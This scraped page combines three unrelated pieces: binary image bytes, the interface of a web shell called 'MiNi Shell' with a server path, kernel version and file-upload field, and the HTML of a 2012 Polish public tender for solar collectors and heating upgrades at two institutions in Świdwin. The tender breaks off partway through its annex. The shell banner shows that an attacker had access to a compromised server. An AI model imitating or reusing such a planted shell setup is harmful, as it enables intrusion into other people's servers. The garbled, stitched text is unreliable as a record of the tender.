JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120626/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120626/138809-N-2012.html

<p class="kh_header"><b>Świdwin: Budowa instalacji kolektorów słonecznych wraz z modernizacją instalacji c.o. w Zespole Szkół Rolniczych CKP w Świdwinie przy ul. Szczecińska 88
oraz Budowa instalacji kolektorów słonecznych w Placówce Opiekuńczo-Wychowawczej, Socjalizacyjnej Dzieciowisko w Świdwinie przy ul. Wojska Polskiego 27</b><br>
<b>Numer ogłoszenia: 138809 - 2012; data zamieszczenia: 26.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Świdwiński , ul. Mieszka I 16, 78-300 Świdwin, woj. zachodniopomorskie, tel. 094 3650301, 3650335, faks 094 3650330.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatswidwinski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa instalacji kolektorów słonecznych wraz z modernizacją instalacji c.o. w Zespole Szkół Rolniczych CKP w Świdwinie przy ul. Szczecińska 88
oraz Budowa instalacji kolektorów słonecznych w Placówce Opiekuńczo-Wychowawczej, Socjalizacyjnej Dzieciowisko w Świdwinie przy ul. Wojska Polskiego 27.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZAMÓWIENIE ZOSTAŁO PODZIELONE NA 2 ZADANIA:

ZADANIE nr 1

Tytuł zadania: Budowa instalacji kolektorów słonecznych wraz z modernizacją instalacji c.o. w Zespole Szkół Rolniczych CKP w Świdwinie przy ul. Szczecińska 88

Zakres robót do wykonania:
Budowę instalacji solarnej wspomagającej przygotowanie ciepłej wody użytkowej dla potrzeb Zespołu Szkół Rolniczych CKP w Świdwinie oraz modernizację instalacji c.o.
Zamówienie obejmuje następujące rodzaje prac:
b)	Roboty budowlane:
- remont w pomieszczeniu węzła cieplnego przy kotłowni budynku, 
-przebicie przepustów instalacji przez ściany i stropy między kondygnacyjne,
-wykonanie posadzki z terakoty i okładziny ścian z glazury, 
-montaż konstrukcji wsporczej na dachu
c)	Roboty instalacyjne sanitarne polegające na:
-montażu baterii kolektorów słonecznych składającej się z 30 paneli oraz pozostałych urządzeń instalacji solarnej i c. w. u
-modernizacja instalacji centralnego ogrzewania a w tym  demontaż starej instalacji c. o i montaż nowej instancji c. o, przyłącza cieplne do budynku szkoły oraz do budynku warsztatów szkolnych
-ulepszenie ciepłej wody użytkowej

d)	Roboty instalacyjne elektryczne w zakresie podłączenia urządzeń elektrycznych na potrzeby instalacji solarnej i instalacji c. w. u.
e)	Przed rozpoczęciem prac Wykonawca zobowiązuje się do dostawy  i montażu TABLICY INFORMACYJNEJ o projekcie zgodnie z wzorem stanowiącym załącznik nr 7 SIWZ. 
Szczegółowy opis przedmiotu zamówienia zawarty jest w projekcie budowlano-wykonawczym, przedmiarze robót oraz szczegółowej specyfikacji technicznej.

ZADANIE nr 2

Tytuł zadania: Budowa instalacji kolektorów słonecznych w Placówce Opiekuńczo-Wychowawczej, Socjalizacyjnej Dzieciowisko w Świdwinie przy ul. Wojska Polskiego 27.
Zakres robót do wykonania:
Budowa instalacji solarnej wspomagającej kotłownię w celu przygotowania ciepłej wody użytkowej dla budynku Placówki Opiekuńczo-Wychowawczej, Socjalizacyjnej Dzieciowisko w Świdwinie

Zamówienie obejmuje następujące rodzaje prac:
a)	Roboty budowlane polegające na: 
-remoncie pomieszczenia kotłowni - węzła cieplnego dla potrzeb instalacji solarnej,
-likwidacja starego pokrycia dachu i zastąpienie go dachówką blaszaną systemową w kolorze ceglastym, 
-wykonaniu na dachu budynku konstrukcji wsporczej dla zespołu kolektorów słonecznych

b)	Roboty instalacyjne sanitarne polegające na:
-montażu baterii kolektorów słonecznych składającej się z 9  paneli oraz pozostałych urządzeń instalacji solarnej i cwu,
-Roboty instalacyjne elektryczne w zakresie podłączenia urządzeń elektrycznych na potrzeby instalacji solarnej i instalacji cwu.

d)	Przed rozpoczęciem prac Wykonawca zobowiązuje się do dostawy  i TABLICY INFORMACYJNEJ o projekcie zgodnie z wzorem stanowiącym załącznik nr 7 SIWZ. 

Szczegółowy opis przedmiotu zamówienia zawarty jest w projekcie budowlano-wykonawczym, przedmiarze robót oraz szczegółowej specyfikacji technicznej.

3.	Występujące w dokumentacji nazwy własne producentów zostały użyte wyłącznie w celu wskazania założonego standardu przyjętych rozwiązań. Zamawiający dopuszcza zastosowanie materiałów lub urządzeń równoważnych innych producentów, pod warunkiem zachowania minimalnych parametrów wskazanych w dokumentacji projektowej i STWiOR. Jeżeli materiały lub urządzenia będą posiadały parametry gorsze od wymaganych, Zamawiający odrzuci ofertę na podstawie art. 89 ust.1 pkt.2 ustawy Prawo zamówień publicznych. W przypadku zaoferowania przez Wykonawcę materiałów i urządzeń równoważnych, Wykonawca zobowiązany jest dołączyć do oferty wykaz, w którym poda parametry techniczne, oraz nazwę producenta. W powyższym ma zastosowanie art. 30 ust. 5 ustawy -prawa zamówień publicznych. 

4.	Dla realizacji zamówienia na powyższe zadania należy uwzględnić również  niżej wymienione czynności i roboty oraz poniesienie kosztów z tym związanych:
a)	 wykonanie wszelkich niezbędnych robót przygotowawczych, towarzyszących 
i zabezpieczających koniecznych do wykonania zamówienia,
b)	poniesienia wszelkich opłat i odszkodowań za wyrządzone szkody w związku 
z realizacją budowy,
c)	dostarczenie Zamawiającemu przed wbudowaniem certyfikatów, atestów oraz po wykonaniu zadania dokumentacji powykonawczej wraz z wynikami prób 
i sprawdzeń, przygotowanie kompletnej dokumentacji i niezbędnej do dopuszczenia z UDT oraz instrukcji eksploatacji zatwierdzonej przez ZAMAWIAJĄCEGO
d)	wywiezienie elementów pochodzących z rozbiórki w miejsce uzgodnione z Zamawiającym, potwierdzone protokołem przekazania do właściwego podmiotu,
e)	ponoszenie kosztów zużycia wody i energii elektrycznej niezbędnych do montażu instalacji, jej sprawdzenia i rozruchu. Ponoszenie kosztów zużycia tych mediów w okresie realizacji robót będzie następować na podstawie porozumień Wykonawcy z Zamawiającym,
f)	Wykonywanie robót  objętych niniejszym zamówieniem nie może utrudniać funkcjonowania szkoły placówki ani stwarzać zagrożenia dla uczniów wychowanków i pracowników 
g)	przeszkolenie wyznaczonych przez Zamawiającego pracowników z zasad eksploatacji instalacji solarnej, czego potwierdzeniem będzie podpisane przez użytkownika  ( Zespół Szkół Rolniczych CKP w Świdwinie oraz  Placówka Opiekuńczo- Wychowawcza  Socjalizacyjna Dzieciowisko w Świdwinie) oświadczenie,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 09.33.11.00-9, 45.00.00.00-7, 45.33.22.00-5, 45.33.11.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.1. 	Wadium należy wnieść odpowiednio do części/zadania zamówienia:
a)	W przypadku składnia oferty tylko na jedną cześć to na:
-Zadanie nr 1 należy odpowiednio wnieść wadium w wysokości 25 000zł (słownie: trzydzieści sześć tysięcy 00/100 złotych)
-Zadanie nr 2  należy odpowiednio wnieść  wadium w wysokości 3 500 zł (słownie: trzy  tysiące pięćset złotych 00/100 )
Wadium może być wnoszone w jednej lub kilku formach:
-	pieniądzu,
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
-	gwarancjach bankowych,
-	gwarancjach ubezpieczeniowych,
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt. 4 lit. b ustawy z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz. 1158 oraz z 2002 r. Nr 25, poz. 253, nr 66, poz. 596 i Nr 216, poz. 1824).  
1.2.	Wadium w pieniądzu wpłacać należy na konto Starostwa Powiatowego w Świdwinie nr   11 1240 3682 1111 0000 4200 9670
1.3.	Dokument przelewu należy opisać odpowiednio do części/ zadania następująco:

a)	W przypadku składnia oferty tylko na jedną cześć to:
Na Zadanie nr 1 należy opisać : 
Wadium - ZP.272.3.2012 ZSRCKP

Na Zadanie nr 2 należy opisać:
Wadium - ZP.272.3.2012 POWS Dzieciowisko

1.4.	Kopię przelewu należy załączyć do oferty.
1.5.	Dokument wniesienia wadium w formie innej niż pieniężna należy dołączyć do oferty w oryginale lub kopii potwierdzonej za zgodność przez wykonawcę.
1.6.	Termin złożenia wadium - do dnia  10.07.2012r r. do godz. 9:00
1.7.	Wadium wnoszone w pieniądzu uznane będzie za wniesione w terminie tylko w przypadku wpłynięcia na konto Zamawiającego przed upływem terminu wyznaczonego na  złożenie oferty.
1.8.	Zgodnie z postanowieniami art. 46 Ustawy - Prawo zamówień publicznych, Zamawiający dokonuje zwrotu wadium w n w wypadkach:


Niezwłocznie:
-	wszystkim wykonawcom po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy.  wykonawcy, którego oferta została wybrana jako najkorzystniejsza, po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.  
-	na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.

Zamawiający żąda ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie art. 46 ust. 1, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego. 
Wadium wniesione w pieniądzu, Zamawiający zwróci wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy.

 2. Utrata wadium.

2.1.  Zgodnie z art. 46 ust. 5 Ustawy - Prawo zamówień publicznych Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana, jeżeli:

a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadania nr 1:
W postępowaniu mogą wziąć udział wykonawcy którzy wykonali w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, minimum po 2 roboty budowlane, odpowiadające swoim rodzajem i wartością robocie budowlanej stanowiącej przedmiot zamówienia. Przez roboty budowlane odpowiadające rodzajem rozumie się roboty polegające na budowie instalacji kolektorów słonecznych oraz modernizacji instalacji c.o.  
Przez roboty budowlane  odpowiadające wartością dla budowy instalacji kolektorów słonecznych należy rozumieć 2 roboty o wartości nie mniejszej niż 200 000 zł brutto, 
natomiast  
Przez roboty budowlany odpowiadającą wartością dla modernizacji instalacji c.o. należy rozumieć 2 roboty o wartości nie mniejszej niż 700 000 zł brutto.

Zadanie nr 2:
W postępowaniu mogą wziąć udział wykonawcy którzy wykonali w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, minimum 2 roboty budowlane, odpowiadającą swoim rodzajem i wartością robocie budowlanej stanowiącej przedmiot zamówienia. Przez robotę budowlaną odpowiadającą rodzajem rozumie się roboty polegające na budowie instalacji kolektorów słonecznych oraz modernizacji instalacji c.o.  Przez robotę budowlaną  odpowiadającą wartością należy rozumieć robotę o wartości nie mniejszej niż 100 000 zł brutto,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	W postępowaniu mogą wziąć udział wykonawcy, którzy:

Dysponują min. 1 osobą uprawnioną do kierowania robotami budowlanymi w następujących specjalnościach:
1)konstrukcyjno-budowlanej bez ograniczeń,
2)instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;
3)instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;
Zamawiający dopuszcza łączenie w/w specjalności, jeżeli uprawniona osoba posiadała łącznie wymagane przez Zamawiającego uprawnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w przypadku :
a)	Zmiany danych adresowych Zamawiającego lub Wykonawcy
b)	Korekty wynagrodzenia. Wynagrodzenie może ulec zmianie w przypadku wystąpienia robót zamiennych lub zaniechanych w stosunku do projektu budowlanego. Roboty zamienne i zaniechane w stosunku do projektu budowlanego zostaną wówczas  rozliczone wycenionym przedmiarem robót różnicowym z korektą wynagrodzenia. Podstawą będzie wyceniony przedmiar robót i wskaźniki cenotwórcze określone w wycenionym przedmiarze robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatswidwinski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Świdwinie 
ul. Mieszka I 16, 78-300 Świdwin,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.07.2012 godzina 09:00, miejsce: Starostwo Powiatowe w Świdwinie 
ul. Mieszka I 16, 78-300 Świdwin,
(Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w związku z realizacją projektu:

Nazwa projektu: Działanie infrastrukturalne na rzecz poprawy stanu środowiska w obiektach użyteczności publicznej na terenie Dorzecza Parsęty . 

Nr projektu: KIK/48

Projekt jest współfinansowany w ramach Szwajcarsko- Polskiego Programu Współpracy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa instalacji kolektorów słonecznych wraz z modernizacją instalacji c.o. w Zespole Szkół Rolniczych CKP w Świdwinie przy ul. Szczecińska 88.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budowę instalacji solarnej wspomagającej przygotowanie ciepłej wody użytkowej dla potrzeb Zespołu Szkół Rolniczych CKP w Świdwinie oraz modernizację instalacji c.o.
Zamówienie obejmuje następujące rodzaje prac:
b)	Roboty budowlane:
-remont w pomieszczeniu węzła cieplnego przy kotłowni budynku, 
-przebicie przepustów instalacji przez ściany i stropy między kondygnacyjne,
-wykonanie posadzki z terakoty i okładziny ścian z glazury, 
-montaż konstrukcji wsporczej na dachu
c)	Roboty instalacyjne sanitarne polegające na:
-montażu baterii kolektorów słonecznych składającej się z 30 paneli oraz pozostałych urządzeń instalacji solarnej i c. w. u
- modernizacja instalacji centralnego ogrzewania a w tym  demontaż starej instalacji c. o i montaż nowej instancji c. o, przyłącza cieplne do budynku szkoły oraz do budynku warsztatów szkolnych
-ulepszenie ciepłej wody użytkowej

d)	Roboty instalacyjne elektryczne w zakresie podłączenia urządzeń elektrycznych na potrzeby instalacji solarnej i instalacji c. w. u.
